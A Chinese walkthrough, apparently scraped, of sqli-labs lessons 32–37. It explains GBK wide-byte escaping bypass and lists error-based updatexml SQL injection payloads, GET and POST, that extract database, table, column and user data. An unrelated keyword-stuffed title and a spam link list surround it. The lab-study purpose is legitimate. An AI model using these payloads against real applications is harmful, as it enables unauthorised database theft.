当前位置: 首页 > news >正文

流媒体网站开发教程建设三合一网站

流媒体网站开发教程,建设三合一网站,邹城建网站,个人能做网站吗目录 前言 less32(宽字节注入) less33(宽字节注入) less34(POST型宽字节注入) less35(数字型闭合宽字节) less36(宽字节注入) less37(POST…

目录

前言

less32(宽字节注入)

less33(宽字节注入)

less34(POST型宽字节注入)

less35(数字型闭合宽字节)

less36(宽字节注入)

less37(POST型宽字节注入)



前言

宽字节注入是基于字节层的,所以在注入时,要用十六进制

\'——引号被转义,无法注入(\'对应十六进制为%5c%27

如果我们在传入的引号前面再加上一个字符能与服务端加的转义符\一同被解析为一个完整的宽字符,那么转义符\就被吃掉了,留下引号用于注入。这个字符我们常用%df

%df%5c%27——'

所以我们只需要传入参数%df%27,后端检测到%27(引号)后,就会在%27前面加上%5c(\)

即%df%5c%27——',造成注入



    less32(宽字节注入)

    直接传参引号不会报错,因为被转义了,利用宽字节注入:

    ?id=%df%27

    利用报错信息,做报错注入:

    ?id=%df%27 or updatexml(1,concat(0x7e,(database()),0x7e),1)--+——爆数据库

    错误pyload:

    ?id=%df%27 or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+注意这里security的引号不能用宽字符注入了,会导致乱码,语法错误。

    正确pyload:

    ?id=%df%27 or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)--+——爆表名

    ?id=%df%27 or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=(select table_schema from information_schema.tables where table_schema=database() limit 3,1)),0x7e),1)--+——爆字段名

    (这里的limit 3,1表示第四张表,忽略前三个表)

    ?id=%df%27 or updatexml(1,concat(0x7e,(select group_concat(id) from security.users),0x7e),1)--+——爆数据



    less33(宽字节注入)

    这道题的pyload和less32一模一样:

    ?id=%df%27 or updatexml(1,concat(0x7e,(database()),0x7e),1)--+——爆数据库

    ?id=%df%27 or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)--+——爆表名

    ?id=%df%27 or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=(select table_schema from information_schema.tables where table_schema=database() limit 3,1)),0x7e),1)--+——爆字段名

    ?id=%df%27 or updatexml(1,concat(0x7e,(select group_concat(id) from security.users),0x7e),1)--+——爆数据



    less34(POST型宽字节注入)

    这关宽字节注入是POST型传参的,先抓包:

    %df'——报错,判断为单引号闭合……

    利用报错注入:

    uname=%df' or updatexml(1,concat(0x7e,(database()),0x7e),1)#&passwd=test&submit=Submit——爆数据库

    uname=%df' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)#&passwd=test&submit=Submit——爆表名

    uname=%df' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=(select table_schema from information_schema.tables where table_schema=database() limit 3,1)),0x7e),1)#&passwd=test&submit=Submit——爆字段名

    uname=%df' or updatexml(1,concat(0x7e,(select group_concat(id) from security.users),0x7e),1)#&passwd=test&submit=Submit——爆数据



    less35(数字型闭合宽字节)

    ?id=1 or updatexml(1,concat(0x7e,(database()),0x7e),1)--+——爆数据库

    ?id=1 or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)--+——爆表名

    ?id=1 or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=(select table_schema from information_schema.tables where table_schema=database() limit 3,1)),0x7e),1)--+——爆字段名

    ?id=1 or updatexml(1,concat(0x7e,(select group_concat(id) from security.users),0x7e),1)--+——爆数据



    less36(宽字节注入)

    pyload和less32一模一样:

    ?id=%df%27 or updatexml(1,concat(0x7e,(database()),0x7e),1)--+——爆数据库

    ?id=%df%27 or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)--+——爆表名

    ?id=%df%27 or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=(select table_schema from information_schema.tables where table_schema=database() limit 3,1)),0x7e),1)--+——爆字段名

    ?id=%df%27 or updatexml(1,concat(0x7e,(select group_concat(id) from security.users),0x7e),1)--+——爆数据



    less37(POST型宽字节注入)

    pyload和less34一样:

    uname=%df%27 or updatexml(1,concat(0x7e,(database()),0x7e),1)#&passwd=test&submit=Submit——爆数据库

    uname=%df%27 or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)#&passwd=test&submit=Submit——爆表名

    uname=%df%27 or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=(select table_schema from information_schema.tables where table_schema=database() limit 3,1)),0x7e),1)#&passwd=test&submit=Submit——爆字段名

    uname=%df%27 or updatexml(1,concat(0x7e,(select group_concat(id) from security.users),0x7e),1)#&passwd=test&submit=Submit——爆数据



    http://www.dtcms.com/a/505528.html

    相关文章:

  1. 网站信息内容建设 宣传部门建造师考试
  2. 建网上商城的第三方网站哪个好全国开发一个网站需要多少钱
  3. 怎么免费做网站不要域名wordpress模块插件
  4. 网站建设项目需求分析建站之星网站 和服务器
  5. 网站建设是什么时间段申请域名代发百度首页排名
  6. 海口网站运营托管咨询电子商务网站建设合同样本
  7. 虚拟机做网站网站界面设计套题
  8. 做个电商网站和app公司营销网站制作
  9. wordpress建站教程贴吧微信扫描 WordPress
  10. 郑州网站制作计划权重7以上的网站
  11. 企业网站 案例wordpress注册直接显示密码
  12. 程序员做外包网站wordpress实惠主机
  13. 彩票网站建设制作如何在线实现手机版网站建设
  14. 镇江市建设工程网站网站seo设置是什么
  15. 响应式网站建设的优势赣州网站建设设计
  16. 怎么建立网站数据库wordpress 文章 排序
  17. 小工厂怎么做网站软件开发工具排行
  18. wordpress增加面包屑导航四川seo推广
  19. 网络科技公司网站源码永久新域名225222
  20. 贷款网站建设医疗网站建设新闻
  21. 南京做网站哪家公司好wordpress主机和域名绑定域名
  22. 深圳做棋牌网站建设找哪家公司好网站超市
  23. 阳江公司做网站男的和女的做那个视频网站
  24. 网站建设美化中期报告跨境电商选品的策略和方法
  25. 长春市做网站的公司网页特效模板
  26. 网站主服务器域名成都网站建设公司创新互联
  27. 网站建设可行性报告范文wordpress主题 问答
  28. 第六感聊城网站建设郑州最好的装修设计公司
  29. 如何在虚拟机中建设网站手机网站建设设计公司
  30. 网站建设所需域名汕头网站制作公司价格